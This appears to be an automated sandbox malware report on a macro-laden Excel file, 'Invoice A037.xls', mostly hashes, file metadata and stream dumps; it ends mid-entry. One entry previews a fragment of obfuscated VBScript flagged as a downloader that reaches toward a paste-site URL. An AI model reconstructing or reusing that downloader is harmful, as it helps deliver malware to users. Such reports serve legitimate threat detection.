                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):53248
                                                                                                                    Entropy (8bit):6.140500730342293
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:BkJrxiqtvn2XuURvEAyHK3G8HWjZ4byHK3G8HWjZ4s:BI12XuyRy
                                                                                                                    MD5:7A848B11C26F45523D9D452F65218BA9
                                                                                                                    SHA1:CB432B95AF47749DBBD7AD4F07AAF06EFBC98987
                                                                                                                    SHA-256:2D2683083128DEB9A7EA35368C7CF34CDA92B700937C948E940899DDA67B1E88
                                                                                                                    SHA-512:1F6816739F6B21E5BCC3EE222D8EF5246D4103846C863F30AAA11238474DB4B18C431FAEFB848948E37AAD8FE2F1CBDEF60B923F830D800D7DB0EEBCDDE98B51
                                                                                                                    Malicious:false
                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):10240
                                                                                                                    Entropy (8bit):0.6739662216458647
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                                                                                                    MD5:C61F99FE7BEE945FC31B62121BE075CD
                                                                                                                    SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                                                                                                    SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                                                                                                    SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                                                                                                    Malicious:false
                                                                                                                    Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24152
                                                                                                                    Entropy (8bit):0.7532185028349225
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35
                                                                                                                    MD5:520FE964934AF1AB0CEBA2366830D0FA
                                                                                                                    SHA1:B90310ACA870261CB619FDFD1E54E1B1A25074FF
                                                                                                                    SHA-256:DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1
                                                                                                                    SHA-512:A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C
                                                                                                                    Malicious:false
                                                                                                                    Preview: ...W....K.h.E..g..0...!1sm.[t\......A......5_...N{Yf?.w..[.Y..A...a^..(._.=.......:.v.$*.....e...F....f.qo.]...B1{.8.%%..,...;.|..<....g ....l.7.`ny.h.n.y...~Y.../.. .WZ.'......AI.|.._K}-$.i..<(.7Y...U....T.i.N.'Pt..c.[........<zni.::. 8W.<S...8!.Wh..;T.?.^yf...E?...pQ....i.;>/..^...r.YsncP..@.. .[".^..A.|.0..$<bC.G........~];..D.|.v.B.).g.E5.?... .N...}....i.,5..a.Fk.%.u.`..F...;xlw.}.5.Jt..c.5.....v...~)..8b|.*.B.]-]jk....PQZ..T}..M.S...88......?.*$..]..%V..D.<.5.d...[..Z.....2........%.$E..+sb.......*...g...>Q[l.}......@=..5L..._....Pi..HY.<[..l...H....9.\=u.v.....S8-&...,5..}t......m...*..R.W.G.NZ....w.....{.iA......G.f.TN.zk..(....q).....n....3..C...d./..........................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (559), with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1674
                                                                                                                    Entropy (8bit):4.529024305673106
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:VV++ywYw11yTwY+VNcowY1zgYI9A2l4X8fK:rzXicX8fK
                                                                                                                    MD5:A9DE1DD61052FB7164600306135B0771
                                                                                                                    SHA1:4EFEFAF03B42637E74817B4695FC086B2D95191E
                                                                                                                    SHA-256:BFBE88F62A33E1CD2289A9179DFE2151C9427C0CCD13753A029C3DCB78852FAE
                                                                                                                    SHA-512:9CE749FF8B7BB054B827534AFBD900A44E6AA03E8818D4CF9121CC9E8448EBC0A21CE641E6DB4D0824C14806CD34F8FEE301A523C338526CB9C5757E1547F6BD
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_VBS_Downloader_Generic, Description: Yara detected VBS Downloader Generic, Source: C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS, Author: Joe Security
                                                                                                                    Preview:..D.i.m. .k.a.t.c.i.n.a.,. .s.u.b.s.u.l.c.u.s.........k.a.t.c.i.n.a. .=. .".h.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...t.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...t.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...p.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...s.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...:.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=.../.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=.../.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...p.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...a.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...s.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...t.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...e.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=.....=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...r.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...s.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=.../.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...A.=...=...&.&{&=...=..=._..&=.V.y&=.G.
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 11 09:54:13 2024, Security: 1
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1063424
                                                                                                                    Entropy (8bit):7.777286249209805
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:gdmzHJEUiOIBUzMTSPD3DERnLRmF8DmEPmxpsAQx1Zj+jZEPrn0pNUjqhpD1g57Z:hBambARM8FA8Z+jUreoqP1271Y2T
                                                                                                                    MD5:B5F6C916E13EC0EA3198B36452373F12
                                                                                                                    SHA1:14F791E399C7392B277D3D96386F1147F0EF1672
                                                                                                                    SHA-256:ED005969F4BDB3C2259F8DA10D6F38E4AA50FA7C6F32E22FBF457B84525B00D1
                                                                                                                    SHA-512:570241E4C094990E0EAD76714C5F3286192B9583BD1884F96597E3552ADE459CD938C3A1A2927DA7F6DE3AAACE4907D4D251A1C46B534D3FE1CE2076824CE9D0
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>.......................................................@...A...B...C...p...q...r.......-...............d.......f...............................................................................................................................................................................................................................................................................................................................................................................................?...}...,........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>.......o...................E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):26
                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                    Malicious:false
                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 11 09:54:13 2024, Security: 1
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1063424
                                                                                                                    Entropy (8bit):7.777286249209805
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:gdmzHJEUiOIBUzMTSPD3DERnLRmF8DmEPmxpsAQx1Zj+jZEPrn0pNUjqhpD1g57Z:hBambARM8FA8Z+jUreoqP1271Y2T
                                                                                                                    MD5:B5F6C916E13EC0EA3198B36452373F12
                                                                                                                    SHA1:14F791E399C7392B277D3D96386F1147F0EF1672
                                                                                                                    SHA-256:ED005969F4BDB3C2259F8DA10D6F38E4AA50FA7C6F32E22FBF457B84525B00D1
                                                                                                                    SHA-512:570241E4C094990E0EAD76714C5F3286192B9583BD1884F96597E3552ADE459CD938C3A1A2927DA7F6DE3AAACE4907D4D251A1C46B534D3FE1CE2076824CE9D0
                                                                                                                    Malicious:true
                                                                                                                    Preview:......................>.......................................................@...A...B...C...p...q...r.......-...............d.......f...............................................................................................................................................................................................................................................................................................................................................................................................?...}...,........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>.......o...................E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Dec 11 05:50:39 2024, Security: 1
                                                                                                                    Entropy (8bit):7.760891931738364
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                    File name:Invoice A037.xls
                                                                                                                    File size:1'072'128 bytes
                                                                                                                    MD5:78c7227d02510326cd88eb38003b252e
                                                                                                                    SHA1:742a16e734f3e3ede2f8acdbc89aef3962c4f338
                                                                                                                    SHA256:41cf481a165a9e4c70bcd9170b283912783b18e5b8af8a21e76cb0f175d167c9
                                                                                                                    SHA512:404b54b509f37e50f7ad5a7f7adf942f7daa03810bbc6452b5c4173e7a1e580616094e3c6b419eb1f729f989572ad7c44b56a1494c58a22ef6f2f1f8df99d29c
                                                                                                                    SSDEEP:12288:idmzHJEUiOIBUzMTSyD3DERnLRmF8DGEP3xpsAQx1Zj+jVEPrgtdXGK23mx0ztsq:7BajbARM8138Z+jQrA2Wu5sTYORyx
                                                                                                                    TLSH:3735F1D1B78D9B12D655023935F387AE1721AC13E952427B32F8731E2AF7AE08543F86
                                                                                                                    File Content Preview:........................>.......................................................@...A...B...C...p...q...r.........../...........d.......f......................................................................................................................
                                                                                                                    Icon Hash:276ea3a6a6b7bfbf
                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1
                                                                                                                    Has Summary Info:
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:True
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:False
                                                                                                                    Flash Objects Count:0
                                                                                                                    Contains VBA Macros:True
                                                                                                                    Code Page:1252
                                                                                                                    Author:
                                                                                                                    Last Saved By:
                                                                                                                    Create Time:2006-09-16 00:00:00
                                                                                                                    Last Saved Time:2024-12-11 05:50:39
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:1
                                                                                                                    Document Code Page:1252
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:786432
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                    VBA File Name:Sheet1.cls
                                                                                                                    Stream Size:977
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Attribute VB_Name = "Sheet1"
                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                    Attribute VB_Creatable = False
                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                    Attribute VB_Exposed = True
                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                    Attribute VB_Customizable = True
                                                                                                                    

                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                    VBA File Name:Sheet2.cls
                                                                                                                    Stream Size:977
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Attribute VB_Name = "Sheet2"
                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                    Attribute VB_Creatable = False
                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                    Attribute VB_Exposed = True
                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                    Attribute VB_Customizable = True
                                                                                                                    

                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                    VBA File Name:ThisWorkbook.cls
                                                                                                                    Stream Size:985
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Attribute VB_Name = "ThisWorkbook"
                                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                    Attribute VB_Creatable = False
                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                    Attribute VB_Exposed = True
                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                    Attribute VB_Customizable = True
                                                                                                                    

                                                                                                                    General
                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                    VBA File Name:Sheet1.cls
                                                                                                                    Stream Size:977
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ a P . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 24 c8 61 50 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Attribute VB_Name = "Sheet1"
                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                    Attribute VB_Creatable = False
                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                    Attribute VB_Exposed = True
                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                    Attribute VB_Customizable = True
                                                                                                                    

                                                                                                                    General
                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                    VBA File Name:Sheet2.cls
                                                                                                                    Stream Size:977
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ d . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 24 c8 64 a6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Attribute VB_Name = "Sheet2"
                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                    Attribute VB_Creatable = False
                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                    Attribute VB_Exposed = True
                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                    Attribute VB_Customizable = True
                                                                                                                    

                                                                                                                    General
                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                    VBA File Name:Sheet3.cls
                                                                                                                    Stream Size:977
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 24 c8 8d cb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Attribute VB_Name = "Sheet3"
                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                    Attribute VB_Creatable = False
                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                    Attribute VB_Exposed = True
                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                    Attribute VB_Customizable = True
                                                                                                                    

                                                                                                                    General
                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                    VBA File Name:ThisWorkbook.cls
                                                                                                                    Stream Size:985
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 24 c8 0e ad 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Attribute VB_Name = "ThisWorkbook"
                                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                    Attribute VB_Creatable = False
                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                    Attribute VB_Exposed = True
                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                    Attribute VB_Customizable = True
                                                                                                                    

                                                                                                                    General
                                                                                                                    Stream Path:\x1CompObj
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:114
                                                                                                                    Entropy:4.25248375192737
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                    CLSID:
                                                                                                                    File Type:data
